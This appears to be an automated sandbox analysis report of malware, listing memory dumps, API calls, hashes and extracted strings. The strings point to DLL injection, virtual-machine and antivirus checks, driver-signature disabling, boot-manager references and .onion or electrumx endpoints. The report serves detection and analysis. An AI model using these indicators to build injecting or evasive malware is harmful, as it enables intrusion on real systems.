                                                              • Associated: 00000010.00000002.391168994.0000000000CAA000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391251300.0000000000CB8000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391261462.0000000000CBB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391309345.0000000000CBD000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391336539.0000000000CBF000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391390156.0000000000CC0000.00000080.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391416383.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$,-./01456:;<=>?@BCLMNOPSZ["\$VirtualQuery for stack base failedadding nil Certificate to CertPoolcouldn't create a new cipher blockcouldn't delete an exclusion valuecrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing pu$bad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegcentersyscallexit status found av: %sgcpacert$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtime: unknown unit too many open filesunexpected InstFailunexpected data: %vunknown Go type: %vunknown certi
                                                              • API String ID: 0-2405844374
                                                              • Opcode ID: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction ID: 602d0d954225419760eac9a183926c9f5c22208bff9d0adb6c0c5b0f89df24a9
                                                              • Opcode Fuzzy Hash: f52dded44c5bfb184fc76bd5f06ccdb749f621fea199d5de2af8de05bec7e351
                                                              • Instruction Fuzzy Hash: F251F8B46097158FD340EF65D18575EBBE0FF88708F80892EE48887352DB389949DB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau, xrefs: 00434756
                                                              • m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA, xrefs: 00434778
                                                              • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat, xrefs: 004347C4
                                                              • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br, xrefs: 00434852
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.384661299.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000010.00000002.384616136.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.389724322.00000000009FB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.389791464.0000000000A5B000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.390869312.0000000000C53000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.390880568.0000000000C57000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391168994.0000000000CAA000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391251300.0000000000CB8000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391261462.0000000000CBB000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391309345.0000000000CBD000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391336539.0000000000CBF000.00000040.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391390156.0000000000CC0000.00000080.00020000.sdmp Download File
                                                              • Associated: 00000010.00000002.391416383.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/api/report/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0<invalid opBad Gat$ m->p= next= p->m= prev= span=%s: %s(...), not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCA$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/br$releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
                                                              • API String ID: 0-626581767
                                                              • Opcode ID: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction ID: 0ae21cd2affb92439e9d6b24f9167d9253c8ca15ed842762288491891e5b1343
                                                              • Opcode Fuzzy Hash: 4287dbe8e894c14b7b162e2ea492575a0ac3cadeebb407704c65a5693989bf62
                                                              • Instruction Fuzzy Hash: 9251D4B4608705CFD344EF65D18575EBBE0BF88308F81896EE88887312D7799845CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Executed Functions

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorLast$Create$CloseFirstHandleMutexOpenProcessProcess32SleepSnapshotToolhelp32
                                                              • String ID: ID: $) terminated$, (pid: $DLL filename: $Global\qtxp9g8w$failed to inject DLL: $failed to open process: $failed to wait for an object: $injected$not enough arguments$process $process name:
                                                              • API String ID: 1655518464-3362440526
                                                              • Opcode ID: 811615c686dd7e2b8bf127d5529c178edcab6273597339bb3635e6138e25b633
                                                              • Instruction ID: a6dd7bec8a8874dee0ffbb50ef5179667c9645bc8df6185b324321b93e8b5614
                                                              • Opcode Fuzzy Hash: 811615c686dd7e2b8bf127d5529c178edcab6273597339bb3635e6138e25b633
                                                              • Instruction Fuzzy Hash: 29B15F21B1FA03B6EA14EB25E8941BA6391BF85BD0F404135D94EC73AEEE7CE5758340
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 59578552-0
                                                              • Opcode ID: bbef7475fec8497ee8e19fb3446075f7fe39c188487bf22197f3ecdf8fe8b6c9
                                                              • Instruction ID: d4669e2bc16a293f6a556d0d42e361bf07c6684617916dd6fb8587e562b6f8b3
                                                              • Opcode Fuzzy Hash: bbef7475fec8497ee8e19fb3446075f7fe39c188487bf22197f3ecdf8fe8b6c9
                                                              • Instruction Fuzzy Hash: C6E0EC60E5F143A7F528377558420BC31912F4C370FB04236E12EC23CACD2D75B14A62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A00B31F1
                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6A00B316F,?,?,FFFFFFFE,00007FF6A00B2196), ref: 00007FF6A00B32B0
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6A00B316F,?,?,FFFFFFFE,00007FF6A00B2196), ref: 00007FF6A00B3330
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 2210144848-0
                                                              • Opcode ID: 26715ff7cc39d96f6d37d079edff232458c65da7b58ef50fd20d28b75933661f
                                                              • Instruction ID: 2c29168098848d363dad27f02da0b4a0da964754ae5859c65486c8f05ea4c159
                                                              • Opcode Fuzzy Hash: 26715ff7cc39d96f6d37d079edff232458c65da7b58ef50fd20d28b75933661f
                                                              • Instruction Fuzzy Hash: 5B81D222E1A613A9F7109F6598402BE27A0FB46B95FA44135DE0ED379BDF3CE561C310
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: String$try_get_function
                                                              • String ID: LCMapStringEx
                                                              • API String ID: 1203122356-3893581201
                                                              • Opcode ID: 05fa366c2c50fcaac7f6a3aea4bc55e8ad76e5a7ce2bd5e93f4c74efa4b9c7c3
                                                              • Instruction ID: 0b1bbab4a97d5f382c5ffd670f5e1bf83807a3b4e0e485c00919675aa467ca93
                                                              • Opcode Fuzzy Hash: 05fa366c2c50fcaac7f6a3aea4bc55e8ad76e5a7ce2bd5e93f4c74efa4b9c7c3
                                                              • Instruction Fuzzy Hash: A8113E36A08B8296D764CB55B4402AAB7A4FBC9B90F54413AEECDC3B5DDF3CD4608B40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 1321466686-0
                                                              • Opcode ID: b36c17e84833c21c762e081d6501b26afe2fad55a0ffcd1e741a5b10ca06fde9
                                                              • Instruction ID: a44b93d59416d0e9dd551d02b5ec40f510c6903c5638a9de629d6b72f3bf13a4
                                                              • Opcode Fuzzy Hash: b36c17e84833c21c762e081d6501b26afe2fad55a0ffcd1e741a5b10ca06fde9
                                                              • Instruction Fuzzy Hash: 65317E21A4F243A2FA10BB24D4113B92791AF857C4F940036EA8EC73DFDE6CE9748312
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Info
                                                              • String ID:
                                                              • API String ID: 1807457897-3916222277
                                                              • Opcode ID: 116468216eb2aa1a53ccbbaba1d54fe37ab03232ed46faac14ba305c4149df92
                                                              • Instruction ID: b19b4de527be1773d6676a1218da604e480d09dc30ab08ce0bed40606564a4ea
                                                              • Opcode Fuzzy Hash: 116468216eb2aa1a53ccbbaba1d54fe37ab03232ed46faac14ba305c4149df92
                                                              • Instruction Fuzzy Hash: 7751D532A1DAD29AE720DF24D0443AE7BA0F749748F544135E68D87B8ECF2CD565CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00B632C: GetOEMCP.KERNEL32 ref: 00007FF6A00B6356
                                                              • IsValidCodePage.KERNEL32(?,?,?,?,00000000,?,?,00007FF6A00B6703), ref: 00007FF6A00B6983
                                                              • GetCPInfo.KERNEL32(?,?,?,?,00000000,?,?,00007FF6A00B6703), ref: 00007FF6A00B69CF
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CodeInfoPageValid
                                                              • String ID:
                                                              • API String ID: 546120528-0
                                                              • Opcode ID: 3ff8ca631ef86ca6f5c2971fb809097506687484789c91c91567844e6540621b
                                                              • Instruction ID: bc749300adaf23ad30e415dff31ef2c2b6b3e540942f80451ab7a6468b7470fa
                                                              • Opcode Fuzzy Hash: 3ff8ca631ef86ca6f5c2971fb809097506687484789c91c91567844e6540621b
                                                              • Instruction Fuzzy Hash: 2881F363A0E283B6FB65AF2594501797BA1AB46740F088036C68EC779ADF3DF9618701
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID:
                                                              • API String ID: 442123175-0
                                                              • Opcode ID: 2159cee63f332e5b4ef3014310ffb607f38b8ad07de57b11d7bdfdf344f7b23a
                                                              • Instruction ID: 0cbef1b8336653588a6c0982f09efa2f43d10a38377ff14f4574fdee9ca01143
                                                              • Opcode Fuzzy Hash: 2159cee63f332e5b4ef3014310ffb607f38b8ad07de57b11d7bdfdf344f7b23a
                                                              • Instruction Fuzzy Hash: 9D31E632A1AB86AADB109F25E4442E977A1FB59780F844432EF4DC375ADF3CD466C700
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: FileHandleType
                                                              • String ID:
                                                              • API String ID: 3000768030-0
                                                              • Opcode ID: beb213435944418b0a7098a92ff191e542922997e08339a2c1c5f459433f9161
                                                              • Instruction ID: 4f7fe0a4a4e25fcaa3e5d3f682b75e5870f93a666f553a5012d6c6fe269cbb1c
                                                              • Opcode Fuzzy Hash: beb213435944418b0a7098a92ff191e542922997e08339a2c1c5f459433f9161
                                                              • Instruction Fuzzy Hash: 3A31B522A1AB47A1D764CB7485901782A50FB45BB0F78033AEB6E873E9CF38E471C300
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                              • String ID:
                                                              • API String ID: 3548387204-0
                                                              • Opcode ID: 4aaae75b9b12419c6be5df297f74711c2654a798a4299d08205211ae52a02da9
                                                              • Instruction ID: d83a3314b8500fded206321340156f0fea08771d1f2a9a3610ed40643957a8e9
                                                              • Opcode Fuzzy Hash: 4aaae75b9b12419c6be5df297f74711c2654a798a4299d08205211ae52a02da9
                                                              • Instruction Fuzzy Hash: 4111F320E4F14372FA6873B149622FD15804F853C0F944835E69DCA3CFEE2CB9718262
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6A00AB426,?,?,?,00007FF6A00AB756,?,?,?,?,00007FF6A009D9C7), ref: 00007FF6A00B6BE8
                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF6A00AB426,?,?,?,00007FF6A00AB756,?,?,?,?,00007FF6A009D9C7), ref: 00007FF6A00B6C55
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: EnvironmentStrings$Free
                                                              • String ID:
                                                              • API String ID: 3328510275-0
                                                              • Opcode ID: f3b4e8fa6f374aedebf4be775062589700bbe60ef5d21c987c82f8d63f2b11fc
                                                              • Instruction ID: a88de8681d2ed3046681a3112569d4a030b233023d3b0c3ee9965ffe2270fccc
                                                              • Opcode Fuzzy Hash: f3b4e8fa6f374aedebf4be775062589700bbe60ef5d21c987c82f8d63f2b11fc
                                                              • Instruction Fuzzy Hash: 1901C811F06B93D9DE25FF2568540BA6660FF15BE0F4C8634EE6E877CADE2CE4608600
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92a02608e7d5cc3b1a72d0863b405d3436dfc242bcde27ac4506125b857c04a8
                                                              • Instruction ID: f8b00511ae721fed072816fee9d9a9a5de7d420e3ef4c9464603cff6b6c01da8
                                                              • Opcode Fuzzy Hash: 92a02608e7d5cc3b1a72d0863b405d3436dfc242bcde27ac4506125b857c04a8
                                                              • Instruction Fuzzy Hash: 5421C462E0E243A6E6016F19A84133D2654FF857A1FA54935E91DC73DBCE7CE4A18710
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 20ae23c6d6fbef74d82850b3fe84c8418b075488b0b58547aa3f725b1bc3f0b9
                                                              • Instruction ID: b58700c4341d947c15f59c9dc7284912b21352d038647efaa3de624b3e26f55e
                                                              • Opcode Fuzzy Hash: 20ae23c6d6fbef74d82850b3fe84c8418b075488b0b58547aa3f725b1bc3f0b9
                                                              • Instruction Fuzzy Hash: F3118C72E1E653A6F3109B14E48117A67A0FB81781F950535EA5DD7B9ADF3CE8308B40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6A00AEF39,?,?,0000E94925CDEBB0,00007FF6A00A57A9,?,?,?,?,00007FF6A00B507E,?,?,00000000), ref: 00007FF6A00AE5C1
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 8ba7ba10919a605fa5be2f38f3e1a1ea7ab86b225220a0b5a657c2a20bc7967b
                                                              • Instruction ID: 2fadad3fb0bf62a05eab69ddbfd871d997e336aee16d8f364bbfd14b24237843
                                                              • Opcode Fuzzy Hash: 8ba7ba10919a605fa5be2f38f3e1a1ea7ab86b225220a0b5a657c2a20bc7967b
                                                              • Instruction Fuzzy Hash: 4EF09054F0BB43A2FE655776A8612B912851F88B94F7C1834CD0EC67CAFE2CE4A04220
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 97f5d9e79c4b549db1c29c518ace5159bd1b2bc4b2587db1d5d21b7976dc6957
                                                              • Instruction ID: f8dd600fc7e1d4409485597a4e198c195132f073d9f689690d5d997cb260a3f2
                                                              • Opcode Fuzzy Hash: 97f5d9e79c4b549db1c29c518ace5159bd1b2bc4b2587db1d5d21b7976dc6957
                                                              • Instruction Fuzzy Hash: D8F0ECE1D4E14351F924AF12A4010BD11A2BF847C1FA58430F549CB7CBCE3CD0205610
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 808467561-2761157908
                                                              • Opcode ID: 90a3e8db653702dc102fce382d09046675bfad15844f4f825879c795a0bc11d1
                                                              • Instruction ID: f15f16d1e6c7ff6027bf11366e3a932d7983fc48b14618bed827fd2940e7f0a4
                                                              • Opcode Fuzzy Hash: 90a3e8db653702dc102fce382d09046675bfad15844f4f825879c795a0bc11d1
                                                              • Instruction Fuzzy Hash: 2DB2F872A1A2839BE7758E68D5407FD37A1FB46388F505135DA0A97B8EDF78E910CB00
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00007FF6A00AED60: GetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AED6F
                                                                • Part of subcall function 00007FF6A00AED60: SetLastError.KERNEL32(?,?,?,00007FF6A00A4207,?,?,00000000,00007FF6A00B176C), ref: 00007FF6A00AEE0D
                                                              • TranslateName.LIBCMT ref: 00007FF6A00B905D
                                                              • TranslateName.LIBCMT ref: 00007FF6A00B9098
                                                              • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF6A00AC414), ref: 00007FF6A00B90DD
                                                              • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF6A00AC414), ref: 00007FF6A00B9105
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000022.00000002.622085829.00007FF6A0091000.00000020.00020000.sdmp, Offset: 00007FF6A0090000, based on PE: true
                                                              • Associated: 00000022.00000002.622066570.00007FF6A0090000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622293644.00007FF6A00BF000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622394103.00007FF6A00D3000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000022.00000002.622430367.00007FF6A00D6000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: ErrorLastNameTranslate$CodePageValid
                                                              • String ID: utf8
                                                              • API String ID: 2136749100-905460609
                                                              • Opcode ID: 4340c477a7800e2dfc05755ed1494b7b1ef11fe585d5fadc73b97012c0c4bbd3
                                                              • Instruction ID: 5151d00c1d417afd2c38877a030e338036a63b314692c5df34ae40cdece9b2e5
                                                              • Opcode Fuzzy Hash: 4340c477a7800e2dfc05755ed1494b7b1ef11fe585d5fadc73b97012c0c4bbd3
